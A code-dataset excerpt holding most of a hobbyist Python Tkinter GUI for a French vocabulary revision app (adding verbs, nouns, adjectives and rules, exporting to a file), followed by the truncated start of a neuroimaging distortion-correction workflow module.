Testing purposes\n # Info to fill\n newName = \"\"\n newDesc = \"\"\n newEx = \"\"\n # Function for button handler\n def nextButtonPressed():\n newName = nameEntry.get()\n newDesc = descriptionEntry.get()\n newEx = exampleEntry.get()\n self.ruleList.append(Rule(newName, newDesc, newEx))\n self.dbHandler.addRule(Rule(newName, newDesc, newEx))\n messagebox.showinfo(\"Done!\", \"Created rule \" + newName + \"!\")\n newWin2.destroy()\n return\n # Window for creating rule\n title = Label(newWin2, text=\"New Rule\", font=(\"Helvetica\", 24))\n\n nameEntryLabel = Label(newWin2, text=\"Name:\", font=(\"Helvetica\"))\n nameEntry = Entry(newWin2, font=(\"Helvetica\"))\n\n # NOTE: Some way to enforce a character count relative to the max size of the database entry would be good to implement\n descriptionEntryLabel = Label(newWin2, text=\"Description:\", font=(\"Helvetica\"))\n descriptionScrollbar = Scrollbar(newWin2)\n descriptionEntry = Entry(newWin2, font=(\"Helvetica\"), xscrollcommand=descriptionScrollbar.set)\n descriptionScrollbar.config(command=descriptionEntry.xview)\n\n exampleEntryLabel = Label(newWin2, text=\"Example:\", font=(\"Helvetica\"))\n exampleScrollbar = Scrollbar(newWin2)\n exampleEntry = Entry(newWin2, font=(\"Helvetica\"), xscrollcommand=exampleScrollbar.set) # Scrollbar doesn't work\n exampleScrollbar.config(command=exampleEntry.xview)\n\n nextButton = Button(newWin2, command=nextButtonPressed, text=\"Next\", font=(\"Helvetica\"))\n\n # Geometry\n title.grid(row=0, column=0, columnspan=2)\n nameEntryLabel.grid(row=1, column=0)\n nameEntry.grid(row=1, column=1)\n descriptionEntryLabel.grid(row=2, column=0)\n descriptionEntry.grid(row=2, column=1, columnspan=3, rowspan=2)\n exampleEntryLabel.grid(row=4, column=0)\n exampleEntry.grid(row=4, column=1, columnspan=3, rowspan=2) # Formatting is off\n nextButton.grid(row=5, column=1, columnspan=2)\n\n newWin2.mainloop()\n elif radioVariable.get() == 1: # Testing Purposes\n # info to fill - most complex (ofc)\n newEng = \"\" # Apparently had to unpack this. Apparently doesn't work like it does in c/c++\n newFre = \"\"\n newType = \"\"\n newPP = \"\"\n newReflex = False\n newEtre = False\n newFutur = []\n newPres = []\n newImp = []\n # populate the lists with default values so we don't get issues\n for i in range(6):\n newPres.append(\"\")\n newImp.append(\"\")\n newFutur.append(\"\")\n # There's a lot\n\n # Relevant functions\n def moreButtonCallback():\n moreButtonFrame.grid(row=3, column=0, columnspan=5, rowspan=10)\n presentConjugationFrame.grid(row=0, column=0, columnspan=2, rowspan=6)\n imparfaitConjugationFrame.grid(row=0, column=2, columnspan=2, rowspan=6)\n futurConjugationFrame.grid(row=6, column=0, columnspan=5, rowspan=3)\n # use the lists with a loop to populate the remaining stuff\n for i in range(6): # could compress into one loop if desired\n presLabels[i].grid(row=i, column=0)\n presEntries[i].grid(row=i, column=1)\n for i in range(6):\n impLabels[i].grid(row=i, column=0)\n impEntries[i].grid(row=i, column=1)\n for i in range(6):\n if i % 2 == 0:\n labelCol = 1\n else:\n labelCol = 3\n futurLabels[i].grid(row=(i/2-(i%2)/2), column=labelCol)\n futurEntries[i].grid(row=(i/2-(i%2)/2), column=(labelCol+1)) # Complicated maths\n # Gotta render the less button!\n moreButton.grid_forget() # This didn't seem to work\n lessButton.grid(row=19, column=1) # See if Row is correct when testing! (trial and error)\n goButton.grid(row=19, column=3)\n def lessButtonCallback():\n moreButtonFrame.grid_forget()\n lessButton.grid_forget()\n goButton.grid(row=3, column=3)\n moreButton.grid(row=3, column=1)\n def nextButtonPressed():\n # Fill everything then call the database access function to add it to DB\n # This will be fun\n # Ordinary values\n newEng = englishEntry.get()\n newFre = frenchEntry.get()\n newType = typeSpinboxEntry.get() # might not work\n newPP = ppEntry.get()\n if newType == \"ER Verb\":\n actualType = ERVerb()\n elif newType == \"RE Verb\":\n actualType = REVerb()\n elif newType == \"IRVerb\":\n actualType = IRVerb()\n else:\n actualType = IrregularVerb()\n # Harder\n if reflexiveSpinboxEntry.get() == \"Yes\":\n newReflex = True\n if usesEtreSpinbox.get() == \"Yes\":\n newEtre = True\n # Those lists\n for i in range(6):\n newPres[i] = presEntries[i].get()\n newImp[i] = impEntries[i].get()\n newFutur[i] = futurEntires[i].get()\n # All done\n newVerb = Verb(newEng, newFre, actualType, newReflex)\n newVerb.pastParticiple = newPP\n newVerb.presentConjugation = newPres\n newVerb.imparfaitConjugation = newImp\n newVerb.futureSimpleConjugation = newFutur\n newVerb.usesEtreInPasseCompose = newEtre\n self.verbList.append(newVerb)\n self.dbHandler.addWord(newVerb)\n messagebox.showinfo(\"Done!\", \"Created verb \" + newFre + \"!\")\n newWin2.destroy()\n return\n\n\n # Widget setup\n title = Label(newWin2, text=\"Verb\", font=(\"Helvetica\"))\n\n # Frame\n moreButtonFrame = LabelFrame(newWin2, text=\"More\", font=(\"Helvetica\"))\n\n # Gonna have inputs outside then a button saying more which expands all the conjugations so that they don't clog up the screen if they won't be set immediately\n englishEntryLabel = Label(newWin2, text=\"English:\", font=(\"Helvetica\"))\n englishEntry = Entry(newWin2, font=(\"Helvetica\"))\n\n frenchEntryLabel = Label(newWin2, text=\"French:\", font=(\"Helvetica\"))\n frenchEntry = Entry(newWin2, font=(\"Helvetica\"))\n\n reflexiveLabel = Label(newWin2, text=\"Is Reflexive:\", font=(\"Helvetica\"))\n reflexiveSpinboxEntry = Spinbox(newWin2, values=[\"Yes\", \"No\"])\n\n typeLabel = Label(newWin2, text=\"Type:\", font=(\"Helvetica\"))\n typeSpinboxEntry = Spinbox(newWin2, values=[\"ER Verb\", \"RE Verb\", \"IR Verb\", \"Irregular\"])\n\n moreButton = Button(newWin2, text=\"More...\", font=(\"Helvetica\"), command=moreButtonCallback)\n lessButton = Button(newWin2, text=\"Less...\", font=(\"Helvetica\"), command=lessButtonCallback)\n # All the stuff that the more button activates. It just calls the grid method on the frame and then the respective members of the list\n # Frames\n presentConjugationFrame = LabelFrame(moreButtonFrame, text=\"Present Conjugation\", font=(\"Helvetica\"))\n imparfaitConjugationFrame = LabelFrame(moreButtonFrame, text=\"Imparfait Conjugation\", font=(\"Helvetica\"))\n futurConjugationFrame = LabelFrame(moreButtonFrame, text=\"Future Simple Conjugation\", font=(\"Helvetica\"))\n\n # lists comprising the conjugation table for setting up the labels and entries\n futurEntries = []\n presLabels = []\n presEntries = []\n impLabels = []\n impEntries = []\n futurLabels = []\n\n subjects = [\"je:\", \"tu:\", \"on:\", \"nous:\", \"vous:\", \"ils:\"]\n\n # Logic: have to do 3 seperate loops because of different frames. May as well seperate out lists too for convenience\n for i in range(6):\n presLabels.append(Label(presentConjugationFrame, text=subjects[i], font=(\"Helvetica\")))\n presEntries.append(Entry(presentConjugationFrame, font=(\"Helvetica\")))\n for i in range(6):\n impLabels.append(Label(imparfaitConjugationFrame, text=subjects[i], font=(\"Helvetica\")))\n impEntries.append(Entry(imparfaitConjugationFrame, font=(\"Helvetica\")))\n for i in range(6):\n futurLabels.append(Label(futurConjugationFrame, text=subjects[i], font=(\"Helvetica\")))\n futurEntries.append(Entry(futurConjugationFrame, font=(\"Helvetica\")))\n # That did seriously take about a 10th as long\n # Removing the original work I did (in like an hour )\n\n usesEtreLabel = Label(moreButtonFrame, text=\"Uses Etre in Passe Compose:\", font=(\"Helvetica\"))\n usesEtreSpinbox = Spinbox(moreButtonFrame, values=[\"Yes\", \"No\"])\n\n ppEntryLabel = Label(moreButtonFrame, text=\"Past Participle:\", font=(\"Helvetica\"))\n ppEntry = Entry(moreButtonFrame, font=(\"Helvetica\"))\n\n goButton = Button(newWin2, text=\"Next\", command=nextButtonPressed)\n\n # Geometry\n title.grid(row=0, column=2)\n englishEntryLabel.grid(row=1, column=0)\n englishEntry.grid(row=1, column=1)\n frenchEntryLabel.grid(row=1, column=3) # 2 per line\n frenchEntry.grid(row=1, column=4)\n reflexiveLabel.grid(row=2, column=0) # TODO finish this\n reflexiveSpinboxEntry.grid(row=2, column=1)\n typeLabel.grid(row=2, column=3)\n typeSpinboxEntry.grid(row=2, column=4)\n moreButton.grid(row=3, column=1)\n goButton.grid(row=3, column=3)\n # Note not rending all the conjugations cuz they go under \"more...\"\n elif radioVariable.get() == 2:\n # this is becoming rather aids\n\n # Start with all the widgets (ah duh)\n # Not too many fields to fill luckily\n newEng = \"\"\n newFre = \"\"\n newPlural = \"\"\n newGen = \"\"\n\n # callback function\n def GoButtonCallback():\n newEng = engEntry.get()\n newFre = freEntry.get()\n newPlural = pluralEntry.get()\n newGen = genderEntry.get()\n if newGen == \"Masculine\":\n gender = Masculine()\n else:\n gender = Feminine()\n self.nounList.append(Noun(newEng, newFre, newPlural, gender))\n self.dbHandler.addWord(Noun(newEng, newFre, newPlural, gender))\n newWin2.quit()\n messagebox.showinfo(\"Done!\", \"Added noun \" + newFre + \"!\")\n return\n # Wdigets\n title = Label(newWin2, text=\"Noun\", font=(\"Helvetica\"))\n\n engEntryLabel = Label(newWin2, text=\"English:\", font=(\"Helvetica\"))\n engEntry = Entry(newWin2, font=(\"Helvetica\"))\n\n freEntryLabel = Label(newWin2, text=\"French:\", font=(\"Helvetica\"))\n freEntry = Entry(newWin2, font=(\"Helvetica\"))\n\n pluralEntryLabel = Label(newWin2, text=\"Plural Ending:\", font=(\"Helvetica\"))\n pluralEntry = Entry(newWin2, font=(\"Helvetica\"))\n\n genderEntryLabel = Label(newWin2, text=\"Gender:\", font=(\"Helvetica\"))\n pluralEntry = Spinbox(newWin2, values=[\"Masculine\", \"Feminine\"])\n\n goButton = Button(newWin2, text=\"Next\", command=GoButtonCallback)\n\n # Geometry\n title.grid(row=0, column=0, columnspan=2)\n engEntryLabel.grid(row=1, column=0)\n engEntry.grid(row=1, column=1)\n freEntryLabel.grid(row=2, column=0)\n freEntry.grid(row=2, column=1)\n pluralEntryLabel.grid(row=3, column=0)\n pluralEntry.grid(row=3, column=1)\n genderEntryLabel.grid(row=4, column=0)\n genderEntry.grid(row=4, column=1)\n goButton.grid(row=5, column=0, columnspan=2)\n\n elif radioVariable.get() == 3:\n # Usual shit\n newEng = \"\"\n newFre = \"\"\n newPluralEnd = \"\"\n newFemEnd = \"\"\n\n # button callback\n def goButtonCallback():\n newEng = engEntry.get()\n newFre = freEntry.get()\n newPluralEnd = pluralEntry.get()\n newFemEnd = femEntry.get()\n self.adjectiveList.append(Adjective(newEng, newFre, newPluralEnd, newFemEnd))\n self.dbHandler.addWord(Adjective(newEng, newFre, newPluralEnd, newFemEnd))\n messagebox.showinfo(\"Done!\", \"Added adjective \" + newFre + \"!\")\n newWin2.quit()\n return\n # Widgets\n title = Label(newWin2, text=\"Adjective\", font=(\"Helvetica\"))\n\n engEntryLabel = Label(newWin2, text=\"English:\", font=(\"Helvetica\"))\n engEntry = Entry(newWin2, font=(\"Helvetica\"))\n\n freEntryLabel = Label(newWin2, text=\"French:\", font=(\"Helvetica\"))\n freEntry = Entry(newWin2, font=(\"Helvetica\"))\n\n pluralEntryLabel = Label(newWin2, text=\"Plural Ending:\", font=(\"Helvetica\"))\n pluralEntry = Entry(newWin2, font=(\"Helvetica\"))\n\n femEntryLabel = Label(newWin2, text=\"Feminine Ending:\", font=(\"Helvetica\"))\n femEntry = Entry(newWin2, font=(\"Helvetica\"))\n\n goButton = Button(newWin2, text=\"Next\", command=goButtonCallback)\n\n # Geometry\n title.grid(row=0, column=0, columnspan=2)\n engEntryLabel.grid(row=1, column=0)\n engEntry.grid(row=1, column=1)\n freEntryLabel.grid(row=2, column=0)\n freEntry.grid(row=2, column=1)\n pluralEntryLabel.grid(row=3, column=0)\n pluralEntry.grid(row=3, column=1)\n femEntryLabel.grid(row=4, column=0)\n femEntry.grid(row=4, column=1)\n goButton.grid(row=5, column=0, columnspan=2)\n else:\n # misc\n newEng = \"\"\n newFre = \"\"\n newCom = \"\"\n\n # Callback\n def goButtonCallback():\n newEng = engEntry.get()\n newFre = freEntry.get()\n newCom = comEntry.get()\n\n newMisc = Misc(newEng, newFre)\n newMisc.commentText = newCom\n\n self.miscWordList.append(newMisc)\n # Code to add to db\n messagebox.showinfo(\"Done!\", \"Added misc word \" + newFre + \"!\")\n newWin2.quit()\n return\n # Widgets\n title = Label(newWin2, text=\"Miscelaneous Word\", font=(\"Helvetica\"))\n\n engEntryLabel = Label(newWin2, text=\"English:\", font=(\"Helvetica\")) # This code could probably be declared before the if statement but o well\n engEntry = Entry(newWin2, font=(\"Helvetica\"))\n\n freEntryLabel = Label(newWin2, text=\"French:\", font=(\"Helvetica\"))\n freEntry = Entry(newWin2, font=(\"Helvetica\"))\n\n comScrollbar = Scrollbar(newWin2)\n comEntryLabel = Label(newWin2, text=\"Comment:\", font=(\"Helvetica\"))\n comEntry = Entry(newWin2, font=(\"Helvetica\"), xscrollcommand=comScrollbar.get)\n comScrollbar.config(command=comEntry.xview)\n\n goButton = Button(newWin2, text=\"Next\", command=goButtonCallback)\n\n newWin2.mainloop()\n\n # Widgets\n title = Label(newWin, text=\"Select type to add.\", font=(\"Helvetica\", 24))\n r1 = Radiobutton(newWin, text=\"Rule\", variable=radioVariable, value=0)\n r2 = Radiobutton(newWin, text=\"Verb\", variable=radioVariable, value=1)\n r3 = Radiobutton(newWin, text=\"Noun\", variable=radioVariable, value=2)\n r4 = Radiobutton(newWin, text=\"Adjective\", variable=radioVariable, value=3)\n r5 = Radiobutton(newWin, text=\"Other word\", variable=radioVariable, value=4)\n next = Button(newWin, text=\"Next\", command=newWord2)\n\n r2.select()\n\n # Layout\n title.grid(row=0, column=0,columnspan=3)\n r1.grid(row=1, column=0, columnspan=3)\n r2.grid(row=2, column=0, columnspan=3)\n r3.grid(row=3, column=0, columnspan=3)\n r4.grid(row=4, column=0, columnspan=3)\n r5.grid(row=5, column=0, columnspan=3)\n next.grid(row=6, column=1)\n\n # done\n newWin.mainloop()\n\n def dbExport(self):\n \"Exports the local database to a file provided\" # if someone can suggest a useful format for this then be my guest otherwise we're just getting the weird shit express and that's ok\n # GUI setup\n win = Tk()\n win.title(\"Export\")\n # Required functions\n def export():\n fileAddr = entry.get()\n f = open(fileAddr, 'w', 0)\n f.write(\"French Revision Helper Export by Hugo Sebesta\\n\")\n f.write(\"Verbs:\\n\")\n for word in self.verbList:\n f.write(word.englishDef + \",\" + word.frenchDef + \"\\n\")\n f.write(word.verbType.__class__.__name__ + \"\\n\")\n if word.isReflexive:\n f.write(\"Is reflexive\\n\")\n else:\n f.write(\"Isn't reflexive\\n\")\n f.write(word.pastParticiple + \"\\n\")\n f.write(\"Present Conjugation: \")\n for i in range(6):\n f.write(word.presentConjugation[i] + \",\")\n f.write(\"\\nImparfait Conjugation: \")\n for i in range(6):\n f.write(word.imparfaitConjugation[i] + \",\")\n f.write(\"\\nFuture Simple Conjugation: \")\n for i in range(6):\n f.write(word.futureSimpleConjugation[i] + \",\")\n if word.usesEtreInPasseCompose:\n f.write(\"\\nUses Etre in Passe Compose\")\n else:\n f.write(\"\\nDoesn't use Etre in Passe Compose\")\n f.write(\"\\n --- \\n\")\n f.write(\"Nouns:\\n\")\n for word in self.nounList:\n f.write(word.englishDef + \",\" + word.frenchDef + \"\\n\")\n f.write(word.plural + \",\" + word.gender.__class__.__name__ + \"\\n\")\n f.write(\"\\n --- \\n\")\n f.write(\"Adjectives:\\n\")\n for word in self.adjectiveList:\n f.write(word.englishDef + \",\" + word.frenchDef + \"\\n\")\n f.write(word.plural + \",\" + word.feminine + \"\\n\")\n f.write(\"\\n --- \\n\")\n f.write(\"Misc:\\n\")\n for word in self.miscWordList:\n f.write(word.englishDef + \",\" + word.frenchDef + \"\\n\")\n f.write(word.commentText + \"\\n\")\n f.write(\"\\n --- \\n\")\n f.write(\"Rules:\\n\")\n for rule in self.ruleList:\n f.write(rule.name + \"\\n\")\n f.write(rule.description + '\\n')\n f.write(rule.example + \"\\n\")\n f.write(\"\\n --- \\n\")\n f.write(\"End - FRH, Hugo Sebesta\")\n f.close()\n win.quit()\n return None\n # Widgets\n title = Label(win, text=\"Enter an address to place the file:\", font=(\"Helvetica\"))\n entry = Entry(win, font=(\"Helvetica\"))\n button = Button(win, text=\"Export\", command=export)\n\n win.mainloop()\n\n def __init__(self, root, verbs, nouns, adjectives, miscs, rules, db):\n # Database Handling Class\n self.dbHandler = db\n # Initial variable setting\n self.master = root\n self.verbList = verbs\n self.nounList = nouns\n self.adjectiveList = adjectives\n self.miscWordList = miscs\n self.ruleList = rules\n\n # Adjustments to main Tk class\n self.master.title(\"French Revision Helper\")\n\n # Rendering the main menu\n # Make all the widgets\n\n # Menubar\n # Commands\n def menuFileOpen():\n os.execl(\"FRH.py\", \"1\") # this doesnt work :)\n def menuFileExport():\n self.dbExport()\n def menuFileClose():\n # yea idk what this one wouuld do either\n pass\n\n def menuEditNew():\n self.newWord()\n def menuEditUndo():\n pass # Gonna be realllly hard to implement Not gonna implement (yet)\n def menuEditCut():\n pass # Again another oof Not gonna implement (yet)\n def menuEditCopy():\n pass # Not gonna implement (yet)\n def menuEditPaste():\n pass # Not gonna implement (yet)\n def menuEditDelete():\n pass # Not gonna implement (yet)\n\n def menuHelpAbout():\n self.about()\n def menuHelpHelp():\n self.help()\n # Widgets\n menubar = Menu(self.master)\n filemenu = Menu(menubar, tearoff=0)\n filemenu.add_command(label=\"Open\", command=menuFileOpen)\n filemenu.add_command(label=\"Export\", command=menuFileExport)\n filemenu.add_command(label=\"Close\", command=menuFileClose)\n filemenu.add_separator()\n filemenu.add_command(labe=\"Exit\", command=self.master.quit) # This might be wrong\n menubar.add_cascade(label=\"File\", menu=filemenu)\n\n editmenu = Menu(menubar, tearoff=0)\n editmenu.add_command(label=\"New...\", command=menuEditNew)\n #editmenu.add_command(label=\"Undo\", command=menuEditUndo) # Honestly just gonna be so hard\n #editmenu.add_command(label=\"Cut\", command=menuEditCut)\n #editmenu.add_command(label=\"Copy\", command=menuEditCopy)\n #editmenu.add_command(label=\"Paste\", command=menuEditPaste)\n #editmenu.add_command(label=\"Delete\", command=menuEditDelete)\n menubar.add_cascade(label=\"Edit\", menu=editmenu)\n\n helpmenu = Menu(menubar, tearoff=0)\n helpmenu.add_command(label=\"About\", command=menuHelpAbout)\n helpmenu.add_command(label=\"Help\", command=menuHelpHelp)\n menubar.add_cascade(label=\"Help\", menu=helpmenu)\n\n # Done, make modifications to the root window\n self.master.config(menu=menubar)\n\n # Main GUI Widgets\n # Design: Frame on left containing list of words/rules (switch between through radiobox at top)\n # Frame on right containing all details of words/rules\n # Buttons underneath right frame containing operations\n\n # Begin with relevant frames\n # JOKES to be scrollable everything needs to be on a canvas\n # This is getting complicated...\n leftFrame = Frame(self.master)\n leftListFrameCanvas = Canvas(leftFrame)\n leftListFrame = Frame(leftListFrameCanvas)\n rightFrame = Frame(self.master)\n rightCanvas = Canvas(rightFrame)\n rightDataFrame = Frame(rightCanvas)\n\n # Scrollbar setup\n leftListScrollbar = Scrollbar(leftListFrame, orient=\"vertical\", command=leftListFrameCanvas.yview)\n leftListFrameCanvas.configure(yscrollcommand=leftListScrollbar.set)\n\n rightScrollbar = Scrollbar(rightDataFrame, orient=\"vertical\", command=rightCanvas.yview)\n rightCanvas.configure(yscrollcommand=rightScrollbar.set)\n # Word and Rule lists of widgets to render\n # Single list containing the words then a break then the next set then a break\n # Rule list follows same format\n wordWidgetList = [] # All containing labels, some will be bound to event handlers\n ruleWidgetList = [] # All containing labels, rules bound to handlers etc\n\n # Functions\n def displayWordLists():\n i = 0\n for word in wordWidgetList:\n word.grid(row=i, column=0, columnspan=4) # might be wrong\n i = i + 1\n def displayRuleLists():\n i = 0\n for rule in ruleWidgetList:\n rule.grid(row=i, column=0, columnspan=4)\n i = i + 1\n def searchBarGo():\n pass\n\n def listItemClickedCallback(event):\n widget = event.widget\n # get object corresponding to item clicked (word/rule)\n i = 0\n verbDone = False # Just making sure we don't get into an infinite loop here\n adjDone = False\n nounDone = False\n miscDone = False\n ruleDone = False\n while 1:\n try:\n if self.verbList[i].englishDef == widget.cget(\"text\")[:widget.cget(\"text\").find(\",\")]:\n objectToDisplay = self.verbList[i]\n break\n except Exception:\n verbDone = True\n try:\n if self.adjectiveList[i].englishDef == widget.cget(\"text\")[:widget.cget(\"text\").find(\",\")]:\n objectToDisplay = self.adjectiveList[i]\n break\n except Exception:\n adjDone = True\n try:\n if self.nounList[i].englishDef == widget.cget(\"text\")[:widget.cget(\"text\").find(\",\")]:\n objectToDisplay = self.nounList[i]\n break\n except Exception:\n nounDone = True\n try:\n if self.miscWordList[i].englishDef == widget.cget(\"text\")[:widget.cget(\"text\").find(\",\")]:\n objectToDisplay = self.miscWordList[i]\n break\n except Exception:\n miscDone = True\n try:\n if self.ruleList[i].name == widget.cget(\"text\"):\n objectToDisplay = self.ruleList[i]\n break\n except Exception:\n ruleDone = True\n if verbDone and adjDone and nounDone and miscDone and ruleDone:\n print(\"Error in algorithm determining object in widget\")\n return\n i = i + 1\n\n objectToDisplay = o # just to make my life easier\n # TODO:\n # Create all widgets using the frame as the parent (or the canvas once I figure out which I need to do)\n # Grid them all properly\n # Regrid the buttons - maybe change them so that they're outside the frames so you don't have to scroll to the bottom to click them\n # Enable the relevant buttons\n # Make sure to bind a command for entering text into the entires so that we can swap out the add button for revert or whatever I decided it should be\n # Do it\n if o.__class__.__name__ == \"Verb\":\n pass\n elif o.__class__.__name__ == \"Noun\":\n pass\n elif o.__class__.__name__ == \"Adjective\":\n pass\n elif o.__class__.__name__ == \"Misc\":\n pass\n if o.__class__.__name__ == \"Rule\":\n # Thank the lord cuz my life's easy peasy\n pass\n\n\n def addNewButtonCallback():\n pass\n def revertButtonCallback():\n pass\n def deleteButtonCallback():\n pass\n def saveButtonCallback():\n pass\n\n # Top layer i.e. outside a frame\n title = Label(self.master, text=\"French Revision Helper\", font=(\"Helvetica\", 24))\n\n # Right frame buttons\n addNewButton = Button(rightFrame, text=\"Add\", command=addNewButtonCallback)\n revertButton = Button(rightFrame, text=\"Revert\", command=revertButtonCallback)\n deleteButton = Button(rightFrame, text=\"Delete\", command=deleteButtonCallback, state=DISABLED)\n saveButton = Button(rightFrame, text=\"Save\", command=saveButtonCallback, state=DISABLED)\n\n # Now left frame\n wordRadioButton = Radiobutton(leftFrame, text=\"Words\", command=displayWordLists) # Placed side by side at top\n ruleRadioButton = Radiobutton(leftFrame, text=\"Rules\", command=displayRuleLists)\n\n # Any search bar would go here once constructed (may as well make the entry for it)\n searchBarLabel = Label(leftFrame, text=\"Search:\", font=(\"Helvetica\"))\n searchBarButton = Button(leftFrame, text=\"Go\", command=searchBarGo, state=DISABLED)\n def searchBarEdit():\n searchBarButton.config(state=\"normal\")\n searchBarEntry = Entry(leftFrame, font=(\"Helvetica\"))\n searchBarEntry.bind(\"\", searchBarButton.configure(state=NORMAL))\n\n # Going to have a widget list that will be scrollable\n # Scrollbar declared earlier to make my life easier\n\n wordWidgetList.append(Label(leftListFrame, text=\"Verbs\", font=(\"Helvetica\")))\n for verb in self.verbList:\n newVerbLabel = Label(leftListFrame, text=verb.englishDef + \", \" + verb.frenchDef, font=(\"Helvetica\"))\n newVerbLabel.bind(\"\", listItemClickedCallback)\n wordWidgetList.append(newVerbLabel)\n\n wordWidgetList.append(Label(leftListFrame, text=\"Nouns\", font=(\"Helvetica\")))\n for noun in self.nounList:\n newNounLabel = Label(leftListFrame, text=noun.englishDef + \", \" + noun.frenchDef, font=(\"Helvetica\"))\n newNounLabel.bind(\"\", listItemClickedCallback)\n wordWidgetList.append(newNounLabel)\n\n wordWidgetList.append(Label(leftListFrame, text='Adjectives', font=(\"Helvetica\")))\n for adj in self.adjectiveList:\n newAdjLabel = Label(leftListFrame, text=adj.englishDef + \", \" + adj.frenchDef, font=(\"Helvetica\"))\n newAdjLabel.bind('', listItemClickedCallback)\n wordWidgetList.append(newAdjLabel)\n\n wordWidgetList.append(Label(leftListFrame, text=\"Misc\", font=(\"Helvetica\")))\n for misc in self.miscWordList:\n newMiscLabel = Label(leftListFrame, text=misc.englishDef + \", \" + misc.frenchDef, font=(\"Helvetica\"))\n newMiscLabel.bind(\"\", listItemClickedCallback)\n wordWidgetList.append(newMiscLabel)\n\n # Populate the rule widget list\n for rule in self.ruleList:\n newRuleLabel = Label(leftListFrame, text=rule.name, font=(\"Helvetica\"))\n newRuleLabel.bind(\"\", listItemClickedCallback)\n ruleWidgetList.append(newRuleLabel)\n\n # Set geometry for static parts of the layout\n title.grid(row=0, column=1, columnspan=4)\n\n leftFrame.grid(row=2, column=0, rowspan=14, columnspan=8)\n rightFrame.grid(row=2, column=8, rowspan=14, columnspan=15)\n\n # Canvases\n rightCanvas.grid(row=0, column=0, rowspan=13, columnspan=14)\n leftListFrameCanvas.grid(row=0, column=0, rowspan=12, columnspan=7)\n\n wordRadioButton.grid(row=0, column=0)\n ruleRadioButton.grid(row=0, column=3)\n\n searchBarLabel.grid(row=1, column=0)\n searchBarEntry.grid(row=1, column=1, columnspan=4)\n searchBarButton.grid(row=1, column=5)\n\n leftListFrame.pack()\n rightDataFrame.pack()\n\n saveButton.grid(row=13, column=0, columnspan=5)\n deleteButton.grid(row=13, column=5, columnspan=5) # Check these numbers\n addNewButton.grid(row=13, column=10, columnspan=5)\n\n\n # Scrollbars, interesting shit\n leftListScrollbar.grid(row=0, column=5, rowspan=14)\n rightScrollbar.grid(row=0, column=13, rowspan=13)\n\n # Invoke default button values\n wordRadioButton.invoke()\n\n leftListFrameCanvas.create_window((0,0), window=leftListFrame, anchor=\"nw\")\n rightCanvas.create_window((0,0), window=rightDataFrame, anchor=\"nw\")\n\n self.master.mainloop()\n","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":37224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"445099042","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n\"\"\"\nApply susceptibility distortion correction (SDC)\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n\n.. topic :: Abbreviations\n\n fmap\n fieldmap\n VSM\n voxel-shift map -- a 3D nifti where displacements are in pixels (not mm)\n DFM\n displacements field map -- a nifti warp file compatible with ANTs (mm)\n\n\"\"\"\nfrom __future__ import print_function, division, absolute_import, unicode_literals\n\nimport pkg_resources as pkgr\n\nfrom nipype.pipeline import engine as pe\nfrom nipype.interfaces import utility as niu\nfrom nipype.interfaces import fsl\nfrom nipype.interfaces.ants import CreateJacobianDeterminantImage\nfrom niworkflows.interfaces.registration import ANTSApplyTransformsRPT, ANTSRegistrationRPT\nfrom niworkflows.interfaces.masks import ComputeEPIMask\n\nfrom fmriprep.interfaces import itk\nfrom fmriprep.interfaces import ReadSidecarJSON\nfrom fmriprep.interfaces.bids import DerivativesDataSink\n\n\ndef init_sdc_unwarp_wf(name='sdc_unwarp_wf', settings=None):\n \"\"\"\n This workflow takes in a displacements fieldmap and calculates the corresponding\n displacements field (in other words, an ANTs-compatible warp file).\n \n It also calculates a new mask for the input dataset that takes into account the distortions.\n The mask is restricted to the field of view of the fieldmap since outside of it corrections could not be performed.\n\n .. workflow ::\n\n from fmriprep.workflows.fieldmap.unwarp import init_sdc_unwarp_wf\n wf = init_sdc_unwarp_wf(settings={'reportlets_dir': '.', 'ants_nthreads': 8})\n\n\n Inputs\n\n in_reference\n the reference image\n in_mask\n a brain mask corresponding to ``in_reference``\n name_source\n path to the original _bold file being unwarped\n fmap\n the fieldmap in Hz\n fmap_ref\n the reference (anatomical) image corresponding to ``fmap``\n fmap_mask\n a brain mask corresponding to ``fmap``\n\n\n Outputs\n\n out_reference\n the ``in_reference`` after unwarping\n out_warp\n the corresponding :abbr:`DFM (displacements field map)` compatible with\n ANTs\n out_jacobian\n the jacobian of the field (for drop-out alleviation)\n out_mask\n mask of the unwarped input file\n out_mask_report\n reportled for the skullstripping\n\n \"\"\"\n\n if settings is None:\n # Don't crash if workflow used outside fmriprep\n settings = {'ants_nthreads': 6}\n\n workflow = pe.Workflow(name=name)\n inputnode = pe.Node(niu.IdentityInterface(\n fields=['in_reference', 'in_mask', 'name_source',\n 'fmap_ref', 'fmap_mask', 'fmap']), name='inputnode')\n outputnode = pe.Node(niu.IdentityInterface(\n fields=['out_reference', 'out_warp', 'out_mask',\n 'out_jacobian', 'out_mask_report']), name='outputnode')\n\n meta = pe.Node(ReadSidecarJSON(), name='meta')\n\n explicit_mask_epi = pe.Node(fsl.ApplyMask(), name=\"explicit_mask_epi\")\n\n # Register the reference of the fieldmap to the reference\n # of the target image (the one that shall be corrected)\n ants_settings = pkgr.resource_filename('fmriprep', 'data/fmap-any_registration.json')\n if settings.get('debug', False):\n ants_settings = pkgr.resource_filename(\n 'fmriprep', 'data/fmap-any_registration_testing.json')\n fmap2ref_reg = pe.Node(ANTSRegistrationRPT(generate_report=True,\n from_file=ants_settings, output_inverse_warped_image=True,\n output_warped_image=True, num_threads=settings['ants_nthreads']),\n name='fmap2ref_reg')\n fmap2ref_reg.interface.num_threads = settings['ants_nthreads']\n\n ds_reg = pe.Node(\n DerivativesDataSink(base_directory=settings['reportlets_dir'],\n suffix='fmap_reg'), name='ds_reg')\n\n # Map the VSM into the EPI space\n fmap2ref_apply = pe.Node(ANTSApplyTransformsRPT(\n generate_report=True, dimension=3, interpolation='BSpline', float=True),\n name='fmap2ref_apply')\n\n fmap_mask2ref_apply = pe.Node(ANTSApplyTransformsRPT(\n generate_report=False, dimension=3, interpolation='NearestNeighbor',\n float=True),\n name='fmap_mask2ref_apply')\n\n ds_reg_vsm = pe.Node(\n DerivativesDataSink(base_directory=settings['reportlets_dir'],\n 